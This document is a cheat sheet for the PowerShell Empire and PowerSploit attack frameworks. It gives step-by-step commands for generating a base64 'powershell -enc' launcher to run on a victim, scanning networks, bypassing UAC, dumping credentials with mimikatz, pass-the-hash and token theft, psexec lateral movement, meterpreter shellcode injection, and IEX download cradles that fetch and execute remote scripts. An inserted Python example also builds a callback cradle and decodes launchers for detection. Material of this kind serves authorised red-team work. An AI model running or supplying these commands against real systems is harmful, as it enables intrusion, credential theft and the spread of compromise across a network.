
Powershell Empire Cheat Sheet by fred

Resources

Official Site - http://www.powershellempire.com

In-depth Tutorial + Word/Excel Macro Example -
https://www.youtube.com/watch?v=aDeJBe6eqps

~39:30 - BSides DC 2015 - Bridging the Gap: Lessons in Adversarial Tradecraft
https://www.youtube.com/watch?v=xHkRhRo3l8o

Offensive Active Directory with Powershell
https://www.youtube.com/watch?v=cXWtu-qalSs

Installation

git clone https://github.com/powershellempire/empire

sudo apt-get install python-pip python-openssl

cd empire

cd setup 

sudo ./install.sh

Execution & Exploitation

Create listener and generate Base64 cmd payload
sudo ./empire

listeners

set Name listenername
(Empire 2.x: run uselistener http first, then set Name)
execute

usestager launcher listenername

execute
(generates a one-line "powershell -enc <base64>" launcher; copy & paste it into cmd on the Windows victim)
agents
(the new agent appears here once the launcher calls back to the listener)


Note: type usestager and hit TAB twice to list the other available stagers.
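As an added example (not part of the original cheat sheet or of Empire's own code), the Python below shows what "generate Base64 cmd payload" actually produces: the launcher stager is a PowerShell download cradle encoded as UTF-16LE, base64'd and handed to powershell -enc. The cradle text, the listener address 10.0.0.5:8080 and the URI /index.asp are constructed assumptions for the example, not output from a real listener. The same code decodes a launcher back to plaintext and pulls out the callback URL, which is what you want when triaging a suspicious command line in process-creation logs.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample cradle: the listener 10.0.0.5:8080 and the URI are
# assumptions for this example, not output from a real Empire listener.
SAMPLE_CRADLE = (
    "$wc=New-Object System.Net.WebClient;"
    "$wc.Headers.Add('User-Agent','Mozilla/5.0');"
    "IEX $wc.DownloadString('http://10.0.0.5:8080/index.asp')"
)


def encode_launcher(script: str) -> str:
    """Build a one-line '-enc' launcher from a PowerShell script.

    powershell.exe expects the encoded command as base64 over the
    UTF-16LE bytes of the script, which is why the blob is roughly
    2.7x the script length and why a plain base64 decode shows
    NUL-interleaved text.
    """
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell -noP -sta -w 1 -enc {blob}"


# powershell.exe accepts any unambiguous prefix of -EncodedCommand;
# these are the spellings commonly seen on the command line.
_ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def decode_launcher(cmdline: str) -> Optional[str]:
    """Recover the script from a '-enc' command line, or None if there is
    no well-formed encoded command (no flag, bad base64, odd byte count)."""
    match = _ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:  # UTF-16 text is always an even number of bytes
        return None
    return raw.decode("utf-16-le", errors="replace")


_URL = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
_CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "webclient")


def launcher_indicators(cmdline: str) -> dict:
    """Decode a command line and pull out what an analyst wants first:
    the callback URLs and which download-cradle keywords are present."""
    script = decode_launcher(cmdline)
    if script is None:
        return {"encoded": False, "urls": [], "markers": []}
    lowered = script.lower()
    return {
        "encoded": True,
        "urls": _URL.findall(script),
        "markers": [m for m in _CRADLE_MARKERS if m in lowered],
    }


if __name__ == "__main__":
    launcher = encode_launcher(SAMPLE_CRADLE)
    print(launcher)
    print(launcher_indicators(launcher))
```

Running it prints the constructed launcher and the decoded indicators. Real Empire launchers add further interpreter flags and, in later versions, obfuscation around the cradle, so treat the flag regex as a starting point for a detection rather than a complete one.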
 

Post Exploitation

agents

interact AGENTNAME

sysinfo

usemodule situational_awareness/network/arpscan

set Range 10.0.0.0-10.0.0.255

execute

...
usemodule situational_awareness/network/reverse_dns

set Range 10.0.0.0-10.0.0.255

execute

...
usemodule situational_awareness/network/powerview/user_hunter

execute

...
usemodule situational_awareness/network/powerview/share_finder

set CheckShareAccess True

execute

...
agents

interact AGENTNAME

bypassuac LISTENERNAME

y

...wait for the "agent now active" message to appear...
agents
(the elevated, high-integrity agent is marked with * after the username; use that one for mimikatz)
interact AGENTNAME

mimikatz
(runs Invoke-Mimikatz from the elevated agent; dumped creds are saved to Empire's credential store)
creds
(lists the stored creds with their ID numbers)
dir \\COMPUTERNAME\C$
(test remote admin-share access with the current token; repeat after pth to compare)
creds

pth 1
(pass-the-hash with cred ID 1; mimikatz spawns a new process with that credential and prints its PID)
steal_token PIDNUM
(impersonate the token of that PID so the agent now acts as cred 1's user)
dir \\COMPUTERNAME\C$
(succeeds if cred 1 is a local admin on COMPUTERNAME)
 

Lateral Movement

usemodule situational_awareness/network/powerview/find_localadmin_access

info

execute
(lists the computer names where the current user has local admin rights, i.e. the hosts psexec will work against)
usemodule lateral_movement/invoke_psexec

info

set Listener test1
(name of the listener the new agent should call back to)
set ComputerName WIN10COMP.blah.com
(machine to attack)
info

execute


You can repeat the above process to infect other computers on the domain.

Connect to a Meterpreter Multi-Handler

Start your meterpreter multi handler (exploit/multi/handler, with LHOST/LPORT matching the values below and a PAYLOAD matching the module's Payload option), then do the following:

interact NAME
(target name from the 'agents' menu)
usemodule code_execution/invoke_shellcode

info
(check the Payload option; the handler's PAYLOAD must match it or the session will not come back)
set lhost IPADDRESS
(the IP your multi-handler listens on)
set lport PORT
(the port your multi-handler listens on)
execute
(wait...)
(a meterpreter session will appear in metasploit)
 

PowerSploit

Source - https://github.com/PowerShellMafia/PowerSploit/

Demos
User Hunting - https://www.sixdub.net/?p=591

Reverse meterpreter shell - DLL Injection using PowerSploit and Metasploit
https://www.youtube.com/watch?v=yKoD5Oy8CKQ

PowerShell Toolkit: PowerSploit - Gaining Shells Without Writing To Disk
https://www.youtube.com/watch?v=LEll6qa-REY

PowerSploit Example

cmd

powershell

IEX (New-Object Net.WebClient).DownloadString("https://github.com/PowerShellMafia/PowerSploit/raw/master/CodeExecution/Invoke-Shellcode.ps1")

PowerSploit Priv Esc

cmd

powershell

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1")

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Privesc.psd1")
(Privesc.psd1 is a module manifest, not a script: IEX of it only evaluates a hashtable and loads nothing. PowerUp.ps1 alone defines Invoke-AllChecks, so this line can be dropped.)

Invoke-AllChecks
 
